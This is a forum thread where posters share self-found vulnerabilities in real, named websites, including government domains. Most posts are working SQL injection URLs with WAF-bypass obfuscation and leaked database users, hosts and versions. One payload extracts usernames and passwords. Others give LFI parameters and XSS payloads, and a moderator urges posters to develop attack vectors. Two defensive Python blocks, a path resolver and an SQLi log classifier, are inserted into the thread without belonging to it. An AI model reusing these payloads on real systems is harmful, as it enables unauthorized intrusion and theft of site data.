SQLi, XSS and other vulnerabilities.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,372
    Likes Received:
    789
    Reputations:
    20
    This thread is only for publishing vulnerabilities you found yourself. Any honestly found vulnerability adds to your reputation. The thread is exclusively for newcomers.

    Before posting, check whether the vulnerability you found has already been published. You can do that like this:
    Google:
    Code:
    site:antichat.ru ваш_сайт_с_уязвимостью.ру
    Don't forget that you need to write an exploit with output for SQLi, show an alert() for XSS, read /etc/passwd for LFI, and so on.

     
    #1 Егорыч+++, 10 May 2015
    Last edited by a moderator: 31 May 2015
    CyberTro1n and Mister_Bert0ni like this.
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,440
    Reputations:
    53
    Two http://www.webbonus.net.ua/bitcoin-s.php?sait=-10'+/*!12345union*/+/*!12345select*/ 1,2,3,4,5,6,7,8,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),10+--+ '-
    By the way, there's a WAF here and I used the buffer overflow technique. P.S. I haven't found any articles on this topic anywhere, and there are very few manuals on WAF bypass and so on.
     
  3. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,440
    Reputations:
    53
    Three: LFI

    http://greyslon.ru/index.php

    post
    action=register
    &ajax=true
    &data=login%3De%26email%3De%26pass%3De%26repass%3De%26payeer%3De%26captcha%3De
    &page=../info
    Also this: http://greyslon.ru/htaccess I don't know whether being able to read this file is a vulnerability or not.
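Added here as a defensive example (not code from the post or from the site above): the naive include pattern behind a `page=../info` traversal, beside a page resolver that rejects it. The directory, the allowlist and the function names are assumptions for illustration.

```python
import os
import re
from typing import Optional

TEMPLATE_DIR = "/var/www/app/pages"                       # assumed include directory
ALLOWED_PAGES = {"index", "register", "login", "about"}   # assumed allowlist of pages
_SAFE_NAME = re.compile(r"[a-z0-9_-]{1,32}")


def naive_resolve(page_param: str) -> str:
    """The pattern behind the LFI above: the client's string goes straight into the path."""
    return os.path.normpath(os.path.join(TEMPLATE_DIR, page_param))


def resolve_page(page_param: str) -> Optional[str]:
    """Return the absolute path to include, or None when the request is rejected."""
    name = page_param.strip()
    # 1. Syntactic check: a bare identifier only, so '../info' and
    #    'register/../../etc/passwd' are refused before any path is built.
    if not _SAFE_NAME.fullmatch(name):
        return None
    # 2. Allowlist: the application, not the client, decides which pages are includable
    #    (so a request for 'htaccess' is refused even though it is a plain name).
    if name not in ALLOWED_PAGES:
        return None
    # 3. Containment: even an allowlisted name must resolve inside TEMPLATE_DIR,
    #    which also guards against symlinks left in the pages directory.
    root = os.path.realpath(TEMPLATE_DIR)
    candidate = os.path.realpath(os.path.join(root, name + ".php"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate
```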
     
  4. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    1,033
    Likes Received:
    1,440
    Reputations:
    53
    bidderland.co.in/siteadmin
    This vulnerability is exploited in 5 seconds.
    I didn't find it myself, but it's very interesting and not typical. Whoever figures it out, please keep it a secret.
     
    Bezlishke and Mister_Bert0ni like this.
  5. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    264
    Likes Received:
    102
    Reputations:
    25
    Why didn't you develop it further?
    Code:
    http://www.c2-int.com/news-full.php?id=-1278+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14+--+
    Version: 5.5.43-37.2
    User: c2deuts_ice@localhost
    -----------------------------
    Why make several posts? You can put everything in one.
     
    #5 WallHack, 10 May 2015
    Last edited: 10 May 2015
  6. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,792
    Likes Received:
    835
    Reputations:
    856
    Develop the vulnerabilities further. Try to come up with an attack vector. We aren't selecting you just so that you can find something.
     
    Take_IT and yarbabin like this.
  7. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    HTML:
    http://www.asep7.gov.la/show.php?id=15%27+and+12=16+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12+--+
    5.5.40-0ubuntu0.12.04.1 - output in the page title

    HTML:
    http://www.minddesign.co.uk/show.php?id=483%27+and+34=-2+union+select+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15,16+--+
    5.6.23

    HTML:
    http://www.psych-it.com.au/Psychlopedia/article.asp?id=277+AND+568=-3+union+select+1,concat%28username,0x3a,pass%29,3,4,5,6+from+users+limit+10,1+--+
    4.1.18-nt
     
  8. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    HTML:
    http://www.damico.co.za/staff_profile.asp?STAFF_ID=3+and+12=0+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
    idserver_damico@winwebs03.cpt.wa.co.za
    idserver_damicodb
    5.5.42-cll
     
  9. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    http://goo.gl/imjzsb
    http://goo.gl/8IKVeV
    http://goo.gl/wYRBLz

    http://emofans.ru/gallery/emowallp/
    POST_DATA:
    foto_msort=&foto_sort=null and ++POLYGON((select*from(select*from(select+concat(0x7e7e496e6a6563746564204279204d69737465725f42657274306e697e7e,0x203a3a204461746162617365203a3a ,database(),0x202056657273696f6e203a3a20,version())e)f)x)) -- -



    https://www.choosewellness.com.ph/campus-vote_video-entry.php?id=5 and(select!x-~0.+from(select(select+group_concat(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE(),0x3c62723e506f727420203a3a2020,@@PORT,0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,@@VERSION_COMPILE_MACHINE,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,@@HOSTNAME,0x3c2f7370616e3e))x)x)
     
    #9 Mister_Bert0ni, 10 May 2015
    Last edited: 11 May 2015
    papaher and BabaDook like this.
  10. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    SQLi demonstration by me
     
    Шниперсон and kostea like this.
  11. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    SQLi demonstration by me
     
    Шниперсон and Dondo like this.
  12. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    SQLi on the bitbank site
     
    Шниперсон and Dondo like this.
  13. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    Yes yes, 5 seconds is even too long)))
     
  14. rezistor

    rezistor New Member

    Joined:
    11 May 2015
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
  15. Arboretum

    Arboretum Member

    Joined:
    8 May 2015
    Messages:
    7
    Likes Received:
    8
    Reputations:
    0
    http://java.lordy.ru/
    There's a Java game; once registered, you can write "><script>alert(XSS)</script>" in the chat, after which the XSS pops up on java.lordy.ru.
     
    qwaszx000 and fazernotinworld like this.
  16. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    HTML:
    http://www.jhewlett.com/content/humor.php?id=10%27+and+1=-0+union+select+user%28%29,group_concat%28database%28%29,0x3a,version%28%29%29+--+
    jhewlett_r@209.68.5.201
    jhewlett_prod:5.0.96-log

    HTML:
    http://nightgallery.ca/event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    5.0.96-log
    nightgallery20@72.167.232.44
    nightgallery20

    HTML:
    http://www.australianpaddlesurfer.com.au/review.php?id=113+or+2+group%20by%20concat_ws%280x2f,version%28%29,user%28%29,database%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+
    10.0.17-MariaDB-cll-lve
    austral3_casso@server-2h-r34.ipv4.au.syr

    HTML:
    http://www.novagora.net/rub.php?Rub=0&IDR=5+and+2=0+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5+--+
    4.0.26-standard-log
    novagoraTest
    novagoraTest@10.0.5.18
     
  17. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    154
    Likes Received:
    31
    Reputations:
    2
  18. tiger_x

    tiger_x New Member

    Joined:
    9 May 2015
    Messages:
    27
    Likes Received:
    2
    Reputations:
    7
    HTML:
    http://www.oar.org.ro/press.php?id=-1%20union%20all%20select%20null,null,null,version%28%29,null,null%20--
    Version: 5.6.23
    User: oarorgro_oar@localhost
     
  19. rezistor

    rezistor New Member

    Joined:
    11 May 2015
    Messages:
    3
    Likes Received:
    2
    Reputations:
    1
    XSS :)
    http://gov.cap.ru/?__VIEWSTATE=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&ctl00$Search1$BtnSearch=&__VIEWSTATEGENERATOR=CA0B0334&ctl00$Search1$TextSearch=античат<script>alert()</script>&__EVENTVALIDATION=/wEWBwK1y/X1DALNk6LCAwKbnsfFCAK8lLmCCQLC9M+dCwKC1JS2BwKjz9/DAXkyh+c6G8rMsfjzrV2Wjy6zi7nnNfiqJHMfqPO+S6mI&ctl00$Comments=античат&ctl00$ErrorText=
     
    Mister_Bert0ni likes this.
  20. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    185
    Reputations:
    56
    http://goo.gl/uMgvlO
    Code:
    http://www.perio.com.ua/articles.php?id=.13 and @b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,0x4461746162617365203a3a202020,DATABASE/**_**/(),0x3c62723e506f727420203a3a2020,@@port,0x3c62723e43757272656e745f55736572203a3a202020203a3a  ,@b,0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,VERSION(),0xa3c62723e486f73746e616d65203a3a20,0x3c2f7370616e3e,@@HOSTNAME),3,1337,5,6 -- -
    
    Does anyone know how to get past the WAF on information_schema here?
     
    #20 Mister_Bert0ni, 11 May 2015
    Last edited: 12 May 2015
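Added here as a defensive example (not code from the thread or from any of its posters): a log-side classifier that undoes the obfuscations seen in the payloads of posts #2, #7, #9, #16 and #20, versioned comments like /*!50000UNIoN Select*/, long comment padding, comment splitters such as concat/*_*/( and URL encoding, before matching signatures. The access-log lines and hosts are constructed; only the payload shapes come from the thread.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of a versioned comment, so /*!50000UNIoN Select*/ means UNION SELECT.
_VERSIONED = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
# Every other /* ... */ comment is dead text, however long the padding inside it is.
_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*?\bselect\b")),
    ("schema-probe", re.compile(r"\b(?:database|version|user|current_user)\s*\(\s*\)")),
    ("error-based floor(rand)", re.compile(r"\bfloor\s*\(\s*rand\s*\(")),
    ("error-based geometry", re.compile(r"\b(?:polygon|linestring|multipoint)\s*\(")),
    ("server-variable", re.compile(r"@@(?:version|port|hostname|version_compile_os)")),
]

def normalize(query: str) -> str:
    """Undo URL encoding, comment tricks and letter case before signature matching."""
    s = query
    for _ in range(3):                  # repeat: %2527-style double encoding is common
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = _VERSIONED.sub(r"\1", s)        # keep exactly what MySQL would execute
    s = _COMMENT.sub(" ", s)            # drop padding comments and concat/*_*/( splitters
    return re.sub(r"\s+", " ", s).lower()

def classify(log_line: str) -> list[str]:
    """Signature names matched by the query string of one access-log request line."""
    m = re.search(r'"(?:GET|POST) (\S+)', log_line)    # assumed combined log format
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    if not query:
        return []
    norm = normalize(query)
    return [name for name, rx in _SIGNATURES if rx.search(norm)]

# Constructed sample log lines; the payload shapes mirror the posts in this thread.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/May/2015:12:00:01 +0300] "GET /bitcoin-s.php?sait=-10%27+/*!12345union*/+/*!12345select*/+1,2,database/*AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*/(),4+--+ HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/May/2015:12:00:02 +0300] "GET /event.php?id=91+or+1+group%20by%20concat_ws%280x2a,version%28%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--+ HTTP/1.1" 500 88',
    '198.51.100.7 - - [10/May/2015:12:00:03 +0300] "GET /articles.php?id=.13+and+@b:=current_user()+/*!50000UNIoN+Select*/+1,concat/*_*/(@@port,@b),3+--+- HTTP/1.1" 200 1024',
    '198.51.100.7 - - [10/May/2015:12:00:04 +0300] "GET /articles.php?id=13 HTTP/1.1" 200 1024',
]

def scan(lines=SAMPLE_LOG) -> list[list[str]]:
    """Classify every line; an empty list means no SQLi signature fired."""
    return [classify(line) for line in lines]
```

A WAF that matches raw parameters without this normalisation is exactly what the padded and versioned comments above slip past, so the same normalisation belongs in front of any pattern-based filter.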